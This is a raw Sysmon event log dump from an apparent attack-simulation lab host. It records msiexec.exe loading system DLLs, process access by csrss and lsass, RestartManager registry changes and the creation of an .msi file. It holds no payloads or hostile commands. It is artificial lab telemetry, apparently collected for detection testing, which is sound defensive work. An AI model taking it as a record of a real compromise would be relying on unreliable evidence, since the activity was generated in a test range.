Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697132Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697131Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697130Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697129Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697128Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697127Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697126Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697125Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697124Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697123Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697122Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697121Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697120Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697119Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697118Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697117Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697116Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697115Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697114Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.725{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697113Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697112Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697111Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697110Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697109Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002697108Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697107Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-EE55-62A8-0500-000000006202}396512C:\Windows\system32\csrss.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002697106Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.709{7CF983DC-981D-62AC-1A6B-000000006202}48403916C:\Windows\system32\msiexec.exe{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\ADVAPI32.dll+189bf|C:\Windows\system32\Msi.dll+ba6c8|C:\Windows\system32\Msi.dll+16e294|C:\Windows\system32\Msi.dll+16e90c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 154100x80000000000000002697105Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.720{7CF983DC-9827-62AC-416B-000000006202}2424C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 5625188F216DB3876EA773B268668ECDC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 13241300x80000000000000002697104Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceDWORD (0x00000001)NT AUTHORITY\SYSTEM 12241200x80000000000000002697103Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 13241300x80000000000000002697102Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashBinary DataNT AUTHORITY\SYSTEM 13241300x80000000000000002697101Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-SetValue2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerBinary DataNT AUTHORITY\SYSTEM 12241200x80000000000000002697100Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002697099Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 10341000x80000000000000002697098Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}48401952C:\Windows\system32\msiexec.exe{7CF983DC-9826-62AC-3B6B-000000006202}4244C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\apphelp.dll+20ffd|C:\Windows\system32\apphelp.dll+209c1|C:\Windows\system32\Msi.dll+19fdbd|C:\Windows\system32\Msi.dll+2ea9e|C:\Windows\system32\Msi.dll+474f5|C:\Windows\system32\Msi.dll+10b3b5|C:\Windows\system32\Msi.dll+10a5d6|C:\Windows\system32\Msi.dll+f4b9f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002697097Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.694{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\fusion.dll4.8.3761.0 built by: NET48REL1Assembly managerMicrosoft® .NET FrameworkMicrosoft Corporationfusion.dllMD5=2A73BA7551F7B631AA484CAABD372F06,SHA256=F876EEEC603221DCDD098D1E2A1118012254E9C67851E749DF61D573EA949F55trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002697096Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002697095Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 254200x80000000000000002697094Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5148.msi2022-06-13 14:04:24.0002022-06-17 15:05:11.678NT AUTHORITY\SYSTEM 10341000x80000000000000002697093Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002697092Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-EE56-62A8-0B00-000000006202}6125036C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 11241100x80000000000000002697091Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5148.msi2022-06-17 15:05:11.678NT AUTHORITY\SYSTEM 23542300x80000000000000002697090Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5148.msiMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855falsetrue 11241100x80000000000000002697089Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.678{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5148.msi2022-06-17 15:05:11.678NT AUTHORITY\SYSTEM 534500x80000000000000002696673Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:11.319{7CF983DC-9826-62AC-3C6B-000000006202}3188C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002696672Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002696671Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002696670Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002696669Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002696668Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002696667Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002696666Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002696665Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:11.303{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT 